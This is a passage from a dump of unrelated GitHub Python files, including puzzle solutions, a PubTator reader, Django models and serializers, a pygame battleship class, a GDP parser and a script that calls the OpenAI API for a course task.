Exception {e}')\n\n if self.__document_being_read is not None:\n self.corpus.append(self.__document_being_read)\n\n return self.corpus\n\n def __validate_line_type_transition(self, prev_line_type, curr_line_type):\n if curr_line_type not in self.valid_transitions[prev_line_type]:\n raise Exception(\"Unexpected transition between line types found \"\n f\"'{prev_line_type}' => '{curr_line_type}'.\"\n f\" '{prev_line_type}' can only be followed by\"\n f\" {self.valid_transitions[prev_line_type]}\")\n\n def __get_line_type(self, line, line_number):\n tokens = re.split('[\\t\\n|]', line)[:-1]\n\n if tokens[0] == '' and len(tokens) == 1:\n return self.LineType.DOC_SEP\n if tokens[1] == 'a':\n return self.LineType.ABSTRACT\n if tokens[1] == 't':\n return self.LineType.TITLE\n if len(tokens) == 6:\n return self.LineType.MENTION\n\n raise Exception(f\"Unexpected content received on line #{line_number}\"\n \", the line/data\"\n f\" may have been corrupted. Content: '{line}'\")\n","repo_name":"ArshSekhon/pubtator_loader","sub_path":"pubtator_loader/pubtator_corpus_reader.py","file_name":"pubtator_corpus_reader.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"39591932382","text":"#!/usr/bin/env python3\n\nimport fileinput\n\nPoint = tuple[int, int]\nPointSet = set[Point]\nFold = tuple[str, int]\n\n\ndef read_input() -> list[str]:\n return [str(line.strip()) for line in fileinput.input(\"input.txt\")]\n\n\ndef parse_input(in_lst: list[str]) -> tuple[PointSet, list[Fold]]:\n points = set()\n folds = []\n\n fold_start = -1\n for (idx, line) in enumerate(in_lst):\n if line == \"\":\n fold_start = idx + 1\n break\n split = line.split(\",\")\n points.add((int(split[0]), int(split[1])))\n\n for line in in_lst[fold_start:]:\n line = line.lstrip(\"fold along \")\n split = line.split(\"=\")\n folds.append((split[0], int(split[1])))\n\n return (points, folds)\n\n\ndef apply_fold(points: PointSet, fold: Fold) -> PointSet:\n (axis, level) = fold\n if axis == \"x\":\n points = set(\n map(\n lambda point: (\n level - (point[0] - level) if point[0] > level else point[0],\n point[1],\n ),\n points,\n )\n )\n else:\n points = set(\n map(\n lambda point: (\n point[0],\n level - (point[1] - level) if point[1] > level else point[1],\n ),\n points,\n )\n )\n return points\n\n\ndef main() -> None:\n in_lst = read_input()\n (points, folds) = parse_input(in_lst)\n\n for fold in folds:\n points = apply_fold(points, fold)\n\n x_max = max(points, key=lambda point: point[0])[0]\n y_max = max(points, key=lambda point: point[1])[1]\n\n # Print the Origami\n # Sadly we don't have the font so we have to interprete the output ourself\n for y in range(y_max + 1):\n for x in range(x_max + 1):\n print(\"█\" if (x, y) in points else \" \", end=\"\")\n print()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"StephanBischoff-Digle/adventofcode","sub_path":"2021/13/13.2/proto.py","file_name":"proto.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9011611676","text":"import binascii\nimport magic\n\nfrom hooker import hook\n\n__name__ = 'mime'\nmagic_obj = magic.Magic(flags=magic.MAGIC_MIME_TYPE)\n\n\n@hook(\"imager.with_open\")\ndef mime_file(satori_image, file_path, file_type, fd):\n fd.seek(0)\n chunk = fd.read(512)\n mime = magic_obj.id_buffer(chunk)\n satori_image.set_attribute(file_path, mime, __name__, 
force_create=True)\n\n\n\n@hook(\"imager.on_end\")\ndef clean_magic():\n magic_obj.close()\n","repo_name":"satori-ng/satori-extensions","sub_path":"meta/mime.py","file_name":"mime.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32240401827","text":"# USACO 2017 Dec Bronze\n# Prob 3. Milk Measurement\n\n# FULLY AC\n\nfin = open(\"measurement.in\", \"r\")\nfout = open(\"measurement.out\", \"w\")\n\noutputs = {name: 7 for name in (\"Bessie\", \"Elsie\", \"Mildred\")}\n\nN = int(fin.readline())\n\nentries = [line.strip().split() for line in fin.readlines()]\nentries = [(int(line[0]), line[1], int(line[2])) for line in entries]\n\nentries.sort(key = lambda e: e[0])\n\ndisplay_changes = 0\nbests = [outputs.keys()]\nfor day, name, change in entries:\n outputs[name] += change\n new_best = max(outputs.values())\n new_best_cows = sorted([cow[0] for cow in outputs.items() if cow[1] == new_best])\n\n if new_best_cows != bests:\n display_changes += 1\n bests = list(new_best_cows)\n\nfout.write(f\"{display_changes}\\n\")\nfout.close()\n","repo_name":"colding10/cp-notebook","sub_path":"solutions/usaco-contest/Past Contests/Milk Measurement/measurement.py","file_name":"measurement.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14128556510","text":"\"\"\"\n Command Line Utility Using Python\n\"\"\"\n\nimport argparse\nimport sys\n\n\ndef calc(args):\n if args.o == \"add\":\n return args.x + args.y\n if args.o == \"sub\":\n return args.x - args.y\n if args.o == \"mul\":\n return args.x * args.y\n if args.o == \"div\":\n return args.x / args.y\n else:\n return \"Invalid input\"\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--x', type=float, default=1.0, help=\"This CLI is for adding numbers. Enter 1st number\")\n parser.add_argument('--y', type=float, default=9.0, help=\"This CLI is for adding numbers. Enter 2nd number\")\n parser.add_argument('--o', type=str, default=\"add\", help=\"This CLI is for adding numbers. 
Enter operator\")\n args = parser.parse_args()\n sys.stdout.write(str(calc(args)))\n\n\"\"\"\nRun the abode file through terminal\n\"\"\"","repo_name":"puja809/Python","sub_path":"Command Line Utility.py","file_name":"Command Line Utility.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37519123393","text":"import sys \r\n\r\nres = sys.argv[1:]\r\n\r\nif (len(res) < 2):\r\n print(\"\"\"Usage: python operations.py \r\n Example:\r\n python operations.py 10 3\"\"\")\r\n exit(0)\r\n\r\nelif (len(res) > 2):\r\n print(\"\"\"InputError: too many arguments\r\n Usage: python operations.py \r\n Example:\r\n python operations.py 10 3\"\"\")\r\n exit(0)\r\n\r\nif not res[0].isdigit() or not res[1].isdigit():\r\n print(\"\"\"InputError: only numbers\r\n Usage: python operations.py \r\n Example:\r\n python operations.py 10 3\"\"\")\r\n exit(0)\r\n\r\nx = float(res[0])\r\ny = float(res[1])\r\noperation = x + y\r\nprint(\"Sum: \" + str(int(operation)))\r\noperation = x - y\r\nprint(\"Difference: \" + str(int(operation)))\r\noperation = x * y\r\nprint(\"Product: \" + str(int(operation)))\r\nif y== 0:\r\n operation = \"ERROR (div by zero)\"\r\nelse:\r\n operation = x / y\r\nprint(\"Quotient: \" + str(operation))\r\nif y== 0:\r\n operation = \"ERROR (modulo by zero)\"\r\nelse:\r\n operation = int(x % y)\r\nprint(\"Remainder: \" + str(operation))","repo_name":"Alcheemiist/42-AI-Bootcamp-python","sub_path":"M00/ex04/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5046212674","text":"\"\"\"\nCompile-time hook used to set `StableSwap` constants.\n\nThis file should not be modified directly. 
Values are set based on the\n`pooldata.json` file within each template subdirectory.\n\"\"\"\n\nimport json\n\n\ndef brownie_load_source(path, source):\n\n if \"pool-templates\" not in path.parts:\n return source\n\n with path.parent.joinpath('pooldata.json').open() as fp:\n pool_data = json.load(fp)\n\n decimals = [i['decimals'] for i in pool_data['coins']]\n precision_multiplier = [10**18 // (10**i) for i in decimals]\n rates = [i*10**18 for i in precision_multiplier]\n\n replacements = {\n '___N_COINS___': len(decimals),\n '___PRECISION_MUL___': precision_multiplier,\n '___RATES___': rates,\n '___USE_LENDING___': [i['wrapped'] for i in pool_data['coins']],\n }\n\n for k, v in replacements.items():\n source = source.replace(k, str(v))\n\n return source\n","repo_name":"0xftrestech/curve-contract","sub_path":"brownie_hooks.py","file_name":"brownie_hooks.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74924159209","text":"# -------------------------------------------------------------------------------------------------------------\n# -------------------------------------------------------------------------------------------------------------\n# Таблица приборов учета\n# -------------------------------------------------------------------------------------------------------------\n# -------------------------------------------------------------------------------------------------------------\n# Импортируем Шаблон взаимодействия\nfrom JSON_Backend_framework.Service.Template_Devices_Functions.Settings.MeterDevice.Template_MeterTable_settings import TemplateMeterTable\n# from JSON_Backend_framework.Service.TemplateDecorator import print_log_use_GET_data\n# from JSON_Backend_framework.FormJSON.UM40.Settings.Meter.JSON_Construct_Settings_MeterTable import SettingsMeterTable\n# -------------------------------------------------------------------------------------------------------------\n\n\nclass MeterTable(TemplateMeterTable):\n \"\"\"\n Таблица приборов учета\n\n \"\"\"\n\n # хедерс - Иногда нужен\n _headers = None\n # куки\n _cookies = None\n\n # # Общие настройки\n # Settings = None\n #\n # # Массив из счетчиков\n # _Meters = [{'addr': '72', 'id': 1, 'ifaceCfg': '9600,8n1', 'ifaceName': 'Iface1', 'index': 1, 'pId': 0, 'passRd': '010101010101', 'passWr': '020202020202', 'rtuFider': 1, 'rtuObjNum': 2, 'rtuObjType': 3, 'type': 3, 'typeName': 'Mercury23x'}]\n\n def __init__(self, cookies=None, headers=None, ip_address=None):\n \"\"\"\n Настройки - Таблица Счетчиков\n\n :param cookies:\n :param headers:\n \"\"\"\n if cookies is not None:\n self._cookies = cookies\n if headers is not None:\n self._headers = headers\n\n if ip_address is not None:\n self._ip_address = ip_address\n # # Обнуляем\n # self._define_JSON()\n #\n # def _define_JSON(self):\n # \"\"\"\n # Здесь Сбрасываем настройки\n # \"\"\"\n # # Сбрасываем настройки\n # self.Settings = SettingsMeterTable()\n #\n # # Пункт Первый - Переделываем ВСЕ параметры\n # def _getting_settings(self):\n #\n # \"\"\"\n #\n # В Классе шаблоне метод получения настроек отвечает за встравку GET запроса\n #\n #\n # \"\"\"\n # # Смотрим - есть ли добавленые счетчики\n # data = self.Settings.get_settings()\n # data = data.get(self._Settings_name)\n #\n # # Обнуляем\n # self._define_JSON()\n #\n # if len(data) == 0 :\n # # Теперь если у нас есть данные - Считываем их\n #\n # data = self._request_setting()\n #\n # return data\n #\n # # Запрос настроек\n #\n # 
@print_log_use_GET_data\n # def _request_setting(self):\n # \"\"\"\n # Здесь запрашиваем нужные нам настройки\n #\n # \"\"\"\n #\n # data = []\n # try:\n # # делаем запрос - получаем ответ\n # response = self.read_settings()\n # # Теперь вытаскиваем нужное\n # if response.get('code') == int(200):\n # answer_setting = response.get('data')\n # # Теперь заполянем наши переменные\n # if answer_setting is not None:\n # Settings = answer_setting[self._Settings_name]\n # if Settings is not None :\n # data = Settings\n # except Exception as e:\n #\n # print(\"При считывании параметров возникла ошибка - \" + str(e))\n #\n # return data\n #\n\n# -------------------------------------------------------------------------------------------------------------\n# ПРИМЕР JSON\n# -------------------------------------------------------------------------------------------------------------\n# data= {'Meters': [{\n# 'addr': '72',\n# 'id': 6,\n# 'ifaceCfg': '9600,8n1',\n# 'ifaceName': 'Iface1',\n# 'index': 1,\n# 'pId': 0,\n# 'passRd': '010101010101',\n# 'passWr': '020202020202',\n# 'rtuFider': 1,\n# 'rtuObjNum': 2,\n# 'rtuObjType': 3,\n# 'type': 3,\n# 'typeName': 'Mercury23x'\n# }]}\n# -------------------------------------------------------------------------------------------------------------\n","repo_name":"TR1GUN/json_backend_framework","sub_path":"JSON_Backend_framework/Devices_USPD/UM40/Functional/Settings/Meter/MeterTable.py","file_name":"MeterTable.py","file_ext":"py","file_size_in_byte":5056,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73966878888","text":"from django.db import models\nfrom model_utils import FieldTracker\nfrom django.conf import settings\n\nfrom base.models import PhoneBookBaseModel\n\n# Create your models here.\n\nclass Group(PhoneBookBaseModel):\n tracker = FieldTracker()\n name = models.CharField(\"Group Name\", max_length=100, null=False, blank=False)\n description = models.TextField(\"Description\", blank=True)\n head = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, related_name='head_of')\n authorized_users = models.ManyToManyField(settings.AUTH_USER_MODEL, null=False, related_name='privileges', help_text='Users who are allowed to send sms to the group.')\n\nclass PhoneBookContact(PhoneBookBaseModel):\n\n MEMBER_TYPE = (\n ('SD', 'Student'),\n ('FA', 'Faculty'),\n ('SF', 'Staff')\n )\n\n tracker = FieldTracker()\n name = models.CharField(\"Name\", max_length=100, null=False, blank=False)\n phone_number = models.CharField(\"Phone No.\", max_length=\"15\", null=False, blank=False)\n type = models.CharField(\"Contact Type\", max_length=10, choices=MEMBER_TYPE, null=False, blank=False)\n groups = models.ManyToManyField(Group, related_name='members', through='GroupMember')\n\nclass GroupMember(PhoneBookBaseModel):\n tracker = FieldTracker()\n group = models.ForeignKey(Group, null=False, blank=False)\n member = models.ForeignKey(PhoneBookContact, null=False, blank=False)\n","repo_name":"vamshedhar/smschannel-api","sub_path":"phonebook/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19829470882","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader, random_split\nfrom torchvision import transforms\nfrom torch.optim.lr_scheduler import StepLR\nfrom PIL import Image\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport os\nimport 
glob\nimport wandb\nfrom model import *\nimport argparse\nimport random\nimport numpy as np\n\ntorch.manual_seed(1234)\nrandom.seed(1234)\nnp.random.seed(1234)\n\nparser = argparse.ArgumentParser(description=\"A script with argparse options\")\n\n# Add an argument for an integer option\nparser.add_argument(\"--runname\", type=str, required=False)\nparser.add_argument(\"--projectname\", type=str, required=False)\nparser.add_argument(\"--filepath\", type=str, required=False)\nparser.add_argument(\"--modelpath\", type=str, required=False)\nparser.add_argument(\"--modelname\", type=str, required=True)\nparser.add_argument(\"--batchsize\", type=int, default=4)\nparser.add_argument(\"--savingstep\", type=int, default=10)\nparser.add_argument(\"--epochs\", type=int, default=100)\nparser.add_argument(\"--nottest\", help=\"Enable verbose mode\", action=\"store_true\")\n\nargs = parser.parse_args()\n\narg_batch_size = args.batchsize\narg_epochs = args.epochs\narg_runname = args.runname\narg_projectname = args.projectname\narg_modelname = args.modelname\narg_savingstep = args.savingstep\n\nif args.nottest:\n arg_nottest = True \nelse:\n arg_nottest = False\n\nrun = wandb.init()\n\nartifact = run.use_artifact(args.filepath, type='model')\nartifact_dir = artifact.download()\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nif arg_modelname == 'Unet':\n model = UNet(n_channels=18, n_classes=1).to(device) # Change n_classes based on your output\n \n\nprint(artifact_dir)\nmodel.load_state_dict(torch.load(artifact_dir+f'/{args.modelpath}'))\n\n\n\n# Create the dataset\nin_dir = '/root/home/rgb_data_128/'\ntar_dir = '/root/home/so_data_128/'\n\ndataset = RGBStreamOrderDataset(input_dir=in_dir, target_dir=tar_dir, transform=transform)\n\n\ntrain_size = int(0.8 * len(dataset))\ntest_size = len(dataset) - train_size\ntrain_dataset, test_dataset = random_split(dataset, [train_size, test_size])\n\ntrain_loader = DataLoader(train_dataset, batch_size=arg_batch_size, shuffle=True)\ntest_loader = DataLoader(test_dataset, batch_size=arg_batch_size, shuffle=True)\n\n\n\ndef evaluate_model(model, dataloader, criterion, threshold=0.5, nottest=True):\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(\"------ Evaluation --------\")\n model.eval()\n total_loss = 0\n total_precision = 0\n total_recall = 0\n total_f1 = 0\n num_batches = len(dataloader)\n\n with torch.no_grad():\n for inputs, targets in tqdm(dataloader):\n inputs, targets = inputs.to(device), targets.to(device)\n outputs = model(inputs)\n\n # Apply sigmoid function to ensure outputs are in the probability space\n probs = outputs.sigmoid()\n preds = (probs > threshold).float() # Cast to float to perform calculations\n\n loss = criterion(outputs, targets)\n total_loss += loss.item()\n\n precision, recall, f1 = calculate_precision_recall_f1(preds, targets.float())\n total_precision += precision\n total_recall += recall\n total_f1 += f1\n\n if not nottest:\n break\n\n avg_loss = total_loss / num_batches\n avg_precision = total_precision / num_batches\n avg_recall = total_recall / num_batches\n avg_f1 = total_f1 / num_batches\n\n return avg_loss, avg_precision, avg_recall, avg_f1\n\n\n\n\n","repo_name":"SMATousi/Unet_rgb_to_so","sub_path":"run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16941513718","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by 
HazzaCheng on 2019-09-12\n# https://leetcode.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/\nfrom typing import List\n\nfrom src.main.python.leetcode_by_python.data_structure.TreeNode import TreeNode\n\n\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n node = None\n\n if preorder:\n node = TreeNode(preorder[0])\n target = inorder.index(preorder[0])\n node.left = self.buildTree(preorder[1:target + 1], inorder[:target])\n node.right = self.buildTree(preorder[target + 1:], inorder[target + 1:])\n\n return node\n","repo_name":"minhhahao/LeetCode","sub_path":"src/main/python/leetcode_by_python/tree/No105_Construct_Binary_Tree_from_Preorder_and_Inorder_Traversal.py","file_name":"No105_Construct_Binary_Tree_from_Preorder_and_Inorder_Traversal.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19776840969","text":"import pygame\r\n\r\n\r\nclass Navio(pygame.sprite.DirtySprite):\r\n def __init__(self, pos_x: int, pos_y: int, length: int, direcao: str, sq_size: int, *groups):\r\n super().__init__(*groups)\r\n self.length = length\r\n self.pos_x = pos_x\r\n self.pos_y = pos_y\r\n self.p1_points = 0\r\n self.p2_points = 0\r\n self.direction = direcao\r\n self.set_sprite()\r\n self.isRotated = False\r\n self.verify_direction()\r\n self.transform_sprite()\r\n self.rect = pygame.rect.Rect((self.pos_x * sq_size, self.pos_y * sq_size), self.image.get_size())\r\n self.sunken = False\r\n self.position_grid = []\r\n self.set_position_grid()\r\n self.visible = 0\r\n\r\n def set_sprite(self):\r\n if self.length == 1:\r\n self.image = pygame.image.load(\"images/Navio_1pc.png\")\r\n elif self.length == 2:\r\n self.image = pygame.image.load('images/Navio_2pc.png')\r\n elif self.length == 3:\r\n self.image = pygame.image.load('images/Navio_3pc.png')\r\n elif self.length == 4:\r\n self.image = pygame.image.load('images/Navio_4pc.png')\r\n else:\r\n self.image = pygame.image.load('images/Navio_5pc.png')\r\n\r\n def transform_sprite(self):\r\n if self.isRotated:\r\n self.image = pygame.transform.scale(self.image, (self.length * 50, 50))\r\n else:\r\n self.image = pygame.transform.scale(self.image, (50, self.length*50))\r\n\r\n def set_position_grid(self):\r\n \"\"\"\r\n Define a posição na grelha com base na sua posição inicial x,y e a sua orientação\r\n :return: Lista das posições ocupadas pelo navio\r\n \"\"\"\r\n j = 0\r\n if self.direction == \"horizontal\":\r\n for _ in range(self.length):\r\n self.position_grid.append((self.pos_x + j, self.pos_y))\r\n j += 1\r\n else:\r\n for _ in range(self.length):\r\n self.position_grid.append((self.pos_x, self.pos_y + j))\r\n j += 1\r\n\r\n return self.position_grid\r\n\r\n def verify_direction(self):\r\n if self.direction == \"horizontal\":\r\n self.image = pygame.transform.rotate(self.image, 270)\r\n self.isRotated = True\r\n\r\n def get_position_grid(self):\r\n return self.position_grid\r\n\r\n def set_sunken(self):\r\n self.sunken = True\r\n self.visible = 1\r\n\r\n def get_sunken(self):\r\n return self.sunken\r\n\r\n def get_p1_points(self):\r\n return self.p1_points\r\n\r\n def get_p2_points(self):\r\n return self.p2_points\r\n\r\n def add_p1_points(self):\r\n self.p1_points += 1\r\n\r\n def add_p2_points(self):\r\n self.p2_points += 
1\r\n","repo_name":"Jarjarbinks-exe/BatalhaNavalSD","sub_path":"navios.py","file_name":"navios.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43999715265","text":"\"\"\"\nRead the BEA GDP data from a csv file.\n\nCaleb Braun\n5/9/19\n\"\"\"\nimport os\nimport pandas as pd\nfrom pkg_resources import resource_filename\n\n\ndef parse_gdp(gdp_file=None, syear=2006, eyear=2017):\n \"\"\"\n Collect non-seasonally adjusted GDP data.\n\n Source:\n Table 8.1.5. Gross Domestic Product, Not Seasonally Adjusted\n https://apps.bea.gov/iTable/index_nipa.cfm\n \"\"\"\n if gdp_file is None:\n gdp_file = resource_filename('eiafcst', os.path.join('data', 'raw_data', 'NQGDP_2002-2018_NSA.csv'))\n\n skip_rows = 4\n\n # Read, clean labels, and make (year, quarter) the row index\n gdp = pd.read_csv(gdp_file, header=[0, 1], skiprows=skip_rows, index_col=1).drop(columns=1)\n gdp.index = gdp.index.str.strip()\n gdp = gdp.transpose()\n\n # Build labels for GDP values from (year, quarter) index\n gdp_labeled = pd.DataFrame(gdp.index.tolist(), columns=['EconYear', 'quarter'], index=gdp.index)\n gdp_labeled.loc[:, 'gdp'] = gdp['Gross domestic product']\n gdp_labeled = gdp_labeled.reset_index(drop=True)\n\n gdp_labeled.loc[:, 'EconYear'] = gdp_labeled['EconYear'].astype('int')\n gdp_labeled.loc[:, 'quarter'] = gdp_labeled['quarter'].str[1].astype('int')\n\n gdp_labeled = gdp_labeled[(syear <= gdp_labeled['EconYear']) & (gdp_labeled['EconYear'] <= eyear)]\n\n return gdp_labeled\n\n\nif __name__ == '__main__':\n parse_gdp()\n","repo_name":"JGCRI/eiafcst","sub_path":"eiafcst/dataprep/economic.py","file_name":"economic.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15921764268","text":"# pylint: disable=duplicate-code\n\nimport numpy as np\nimport pytest\n\nfrom src.prediction.prepare_features import prepare_features\n\n\ndef test_prepare_features():\n correct_dict = {\n \"cap_shape\": \"x\",\n \"cap_surface\": \"s\",\n \"cap_color\": \"n\",\n \"bruises\": \"t\",\n \"odor\": \"a\",\n \"gill_attachment\": \"f\",\n \"gill_spacing\": \"c\",\n \"gill_size\": \"n\",\n \"gill_color\": \"b\",\n \"stalk_shape\": \"e\",\n \"stalk_root\": \"e\",\n \"stalk_surface_above_ring\": \"f\",\n \"stalk_surface_below_ring\": \"f\",\n \"stalk_color_above_ring\": \"b\",\n \"stalk_color_below_ring\": \"b\",\n \"veil_type\": \"p\",\n \"veil_color\": \"n\",\n \"ring_number\": \"n\",\n \"ring_type\": \"e\",\n \"spore_print_color\": \"k\",\n \"population\": \"a\",\n \"habitat\": \"g\",\n }\n\n wrong_dict = {\n \"cap_shape\": \"p\",\n \"cap_surface\": \"p\",\n \"cap_color\": \"p\",\n \"bruises\": \"p\",\n \"odor\": \"p\",\n \"gill_attachment\": \"p\",\n \"gill_spacing\": \"p\",\n \"gill_size\": \"p\",\n \"gill_color\": \"p\",\n \"stalk_shape\": \"p\",\n \"stalk_root\": \"p\",\n \"stalk_surface_above_ring\": \"p\",\n \"stalk_surface_below_ring\": \"p\",\n \"stalk_color_above_ring\": \"p\",\n \"stalk_color_below_ring\": \"p\",\n \"veil_type\": \"p\",\n \"veil_color\": \"p\",\n \"ring_number\": \"p\",\n \"ring_type\": \"p\",\n \"spore_print_color\": \"p\",\n \"population\": \"p\",\n \"habitat\": \"p\",\n }\n\n correct_features = prepare_features(correct_dict)\n\n assert isinstance(correct_features, np.ndarray)\n\n num_cat = np.array(\n [6, 4, 10, 2, 9, 2, 2, 2, 12, 2, 5, 4, 4, 9, 9, 1, 4, 3, 5, 9, 6, 7]\n )\n assert np.all(0 <= 
correct_features) and np.all(correct_features < num_cat)\n\n with pytest.raises(ValueError):\n prepare_features(wrong_dict)\n","repo_name":"Alvaro-Kothe/Mushroom-Classification","sub_path":"tests/test_prediction.py","file_name":"test_prediction.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74422201449","text":"#!/usr/bin/env python3\n\nfrom enum import Enum\n\n\nclass CellState(Enum):\n EMPTY = 0\n AI = 1\n ENEMY = 2\n\n @staticmethod\n def from_char(c):\n hmap = {\n \"0\": CellState.EMPTY,\n \"1\": CellState.AI,\n \"2\": CellState.ENEMY,\n }\n\n return hmap.get(c)\n\n @staticmethod\n def to_char(c):\n hmap = {\n CellState.EMPTY: \"0\",\n CellState.AI: \"1\",\n CellState.ENEMY: \"2\",\n }\n\n return hmap.get(c)\n\n @staticmethod\n def opposite_type(c):\n hmap = {\n CellState.EMPTY: CellState.EMPTY,\n CellState.ENEMY: CellState.AI,\n CellState.AI: CellState.ENEMY,\n }\n\n return hmap.get(c)\n","repo_name":"calvetalex/EPITECH","sub_path":"tek3/gomoku/CellState.py","file_name":"CellState.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16271163030","text":"import requests\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\npersonal_api_key = os.getenv(\"PERSONAL_API_KEY\")\nopen_ai_api_key = os.getenv(\"OPENAI_API_KEY\")\n\n\ndef get_token():\n payload = {\"apikey\": personal_api_key}\n response = requests.post('https://zadania.aidevs.pl/token/blogger', json=payload)\n return response.json().get('token')\n\n\ndef get_task():\n token = get_token()\n response = requests.get(f'https://zadania.aidevs.pl/task/{token}')\n return response.json()['blog'], token\n\ndef get_completion():\n topics, token = get_task()\n articles_list = []\n\n for topic in topics:\n content = f'Tworzysz artykuł na bloga na temat przyrzadzania pizyy Margherity. Napisz krotki artykul dla rozdzialu pod tytulem: {topic}. 
Odpowiedz tylko trescia artykulu (bez tytulu), niczym wiecej'\n data = {\"messages\": [{\"role\": \"user\", \"content\": content}], \"model\": \"gpt-3.5-turbo\"}\n headers = {\"Content-Type\": \"application/json\", \"Authorization\": \"Bearer \" + open_ai_api_key}\n response = requests.post('https://api.openai.com/v1/chat/completions', json=data, headers=headers)\n parsed_response = response.json()['choices'][0]['message']['content']\n articles_list.append(parsed_response)\n return (articles_list, token)\n\n\ndef send_answer():\n articles_list, token = get_completion()\n payload = {\"answer\":articles_list}\n response = requests.post(f'https://zadania.aidevs.pl/answer/{token}', json=payload)\n return response.json()\n\n\nprint(send_answer())","repo_name":"bartoszc/AI_Devs","sub_path":"blogger.py","file_name":"blogger.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23216027488","text":"\"\"\"Teacher serializer.\"\"\"\r\n\r\n# Django\r\nfrom django.shortcuts import get_object_or_404\r\nfrom django.core.exceptions import ObjectDoesNotExist\r\n\r\n# Django REST Framework\r\nfrom rest_framework import serializers\r\n\r\n# Models\r\nfrom api.users.models import (\r\n User,\r\n Subscription\r\n)\r\nfrom api.programs.models import (\r\n Course,\r\n CoursePrice,\r\n CourseLanguage,\r\n CourseBenefit,\r\n CourseBlockTrack,\r\n CourseBlock,\r\n CourseItemTrack,\r\n LectureContent,\r\n CourseUserData,\r\n LectureMaterial\r\n)\r\n\r\n# Serializes\r\nfrom .prices import CoursePriceModelSerializer\r\nfrom .languages import CourseLanguageModelSerializer\r\nfrom .benefits import CourseBenefitModelSerializer\r\n\r\n# Utils\r\nfrom datetime import timedelta\r\n\r\nfrom django.db.models import Sum\r\n\r\nclass CourseModelSerializer(serializers.ModelSerializer):\r\n \"\"\"Profile model serializer.\"\"\"\r\n course_price = serializers.SerializerMethodField(read_only=True)\r\n course_language = serializers.SerializerMethodField(read_only=True)\r\n students_count = serializers.SerializerMethodField(read_only=True)\r\n instructor = serializers.SerializerMethodField(read_only=True)\r\n benefits = serializers.SerializerMethodField(read_only=True)\r\n blocks = serializers.SerializerMethodField(read_only=True)\r\n items = serializers.SerializerMethodField(read_only=True)\r\n total_duration = serializers.SerializerMethodField(read_only=True)\r\n\r\n class Meta:\r\n \"\"\"Meta class.\"\"\"\r\n\r\n model = Course\r\n fields = (\r\n 'id',\r\n 'code',\r\n 'title',\r\n 'subtitle',\r\n 'description',\r\n 'course_price',\r\n 'course_language',\r\n 'picture',\r\n 'students_count',\r\n 'students',\r\n 'instructor',\r\n 'published_in_program',\r\n 'offer_persentage',\r\n 'benefits',\r\n 'video_presentation',\r\n 'published',\r\n 'blocks',\r\n 'items',\r\n 'total_duration',\r\n 'color'\r\n )\r\n\r\n read_only_fields = (\r\n 'id',\r\n )\r\n\r\n\r\n def get_students_count(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n students = obj.students.all().count()\r\n return students\r\n\r\n def get_course_price(self, obj):\r\n # import pdb\r\n # pdb.set_trace()\r\n price = CoursePrice.objects.filter(course=obj)\r\n if price.count() > 0:\r\n return CoursePriceModelSerializer(price[0], many=False).data\r\n\r\n def get_course_language(self, obj):\r\n language = CourseLanguage.objects.filter(course=obj)\r\n if language.count() > 0:\r\n return CourseLanguageModelSerializer(language[0], 
